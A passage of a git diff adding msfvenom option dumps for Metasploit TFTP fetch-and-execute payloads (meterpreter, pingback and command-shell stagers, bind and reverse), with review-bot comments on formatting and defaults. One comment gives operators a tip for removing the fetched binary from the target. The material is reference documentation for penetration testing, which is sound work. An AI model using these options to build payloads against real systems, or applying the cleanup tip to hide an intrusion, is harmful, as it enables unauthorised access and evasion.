no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A 
string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..30df9c9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter_reverse_tcp.txt 
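Review bot: The HttpUserAgent default in the cmd/linux/tftp/x64/meterpreter_reverse_https dump (Chrome 131 on macOS) differs from the one in the reverse_http dump (Firefox 133 on macOS) although both come from the same option; the value is chosen at generation time, so like FETCH_FILENAME it will churn on every regeneration and should be normalized. On the content itself: StagerVerifySSLCert defaults to false, meaning the payload does not verify the handler's certificate, and the SSLVersion accepted list still includes SSL3, TLS1 and TLS1.1; neither is wrong for a reference dump, but readers should not take these defaults as hardened settings.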
@@ -0,0 +1,96 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/x64/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME QyRlHtkVN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line 
that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-pingback_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-pingback_bind_tcp.txt new file mode 100644 index 0000000..4042649 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-pingback_bind_tcp.txt 
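Review bot: the Name field in this file is just "TFTP Fetch", whereas every sibling file in this change carries the composed name (e.g. "TFTP Fetch, Linux x64 Pingback, Bind TCP Inline"), and the Description block stops after "Fetch and execute an x64 payload from a TFTP server." with no line for the wrapped meterpreter_reverse_tcp payload. Worth confirming whether the capture was truncated or the upstream module metadata is incomplete before committing; if it is upstream, it belongs in a metasploit-framework issue rather than a local edit. Separately, FETCH_FILENAME defaults to a randomly generated name (QyRlHtkVN here, a different value in every file in this change), so regenerating these snapshots will produce a diff on every run; consider normalising that field (for example replacing the value with a fixed placeholder) in the capture script.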
@@ -0,0 +1,72 @@ + + Name: TFTP Fetch, Linux x64 Pingback, Bind TCP Inline + Module: payload/cmd/linux/tftp/x64/pingback_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME NzcFiQrXd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. 
+ Accept a connection from attacker and report UUID (Linux x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
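Review bot: FETCH_SRVHOST is Required "yes" in this bind variant but "no" in the reverse variants elsewhere in this change, presumably because the reverse payloads have an LHOST to fall back on while this one only exposes LPORT and RHOST; the description "Local IP to use for serving payload" does not say so. Since this repo is meant as a quick reference, a README line stating that the bind payloads need FETCH_SRVHOST set explicitly would save readers a failed generation.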
diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-pingback_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-pingback_reverse_tcp.txt new file mode 100644 index 0000000..91f8afb --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-pingback_reverse_tcp.txt 
@@ -0,0 +1,79 @@ + + Name: TFTP Fetch, Linux x64 Pingback, Reverse TCP Inline + Module: payload/cmd/linux/tftp/x64/pingback_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME avMWkQDXJM no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. 
+ Connect back to attacker and report UUID (Linux x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-shell-bind_tcp.txt new file mode 100644 index 0000000..5bed8a2 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-shell-bind_tcp.txt 
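Review bot: the FETCH_FILELESS description in the Basic options table has an unbalanced parenthesis: "requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)" opens two and closes one; the "(Accepted: ...)" suffix is appended by msfvenom, so the missing ")" is in the module's own description string. It appears identically in every file in this change, so it is an upstream typo to report, not something to patch in these captures.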
@@ -0,0 +1,86 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Stager + Module: payload/cmd/linux/tftp/x64/shell/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME PutzMjXOP no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Spawn a command shell (staged). + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own 
process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-shell-reverse_sctp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-shell-reverse_sctp.txt new file mode 100644 index 0000000..baf62b2 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-shell-reverse_sctp.txt 
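Review bot: the defaults shown in this table (FETCH_FILELESS none, FETCH_WRITABLE_DIR ./, FETCH_DELETE false) mean the fetched x64 ELF is written into the target's current working directory under a random name and left there after execution; nothing in the capture says so. A README note that operators should set FETCH_WRITABLE_DIR to a known path and FETCH_DELETE true, or FETCH_FILELESS bash/python3.8+ where the kernel and Python versions listed allow it, would make the option tables more useful as a reference without touching the captured output.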
@@ -0,0 +1,94 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse SCTP Stager + Module: payload/cmd/linux/tftp/x64/shell/reverse_sctp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + ricky + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME hZmYsAoHn no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own 
process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-shell-reverse_tcp.txt new file mode 100644 index 0000000..77d1455 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-shell-reverse_tcp.txt 
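Review bot: the ReverseAllowProxy description in the advanced table reads "Allow reverse tcp even with Proxies specified" although this module is the reverse SCTP stager; that is the generic mixin text, so nothing to change in the capture, but if the repo ever annotates options it should say that the caveat "Connect back will NOT go through proxy but directly to LHOST" applies to this SCTP connect-back as well.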
@@ -0,0 +1,94 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/tftp/x64/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + ricky + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME YyItPlDQG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own 
process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-shell_bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_bind_ipv6_tcp.txt new file mode 100644 index 0000000..6ea50bd --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_bind_ipv6_tcp.txt 
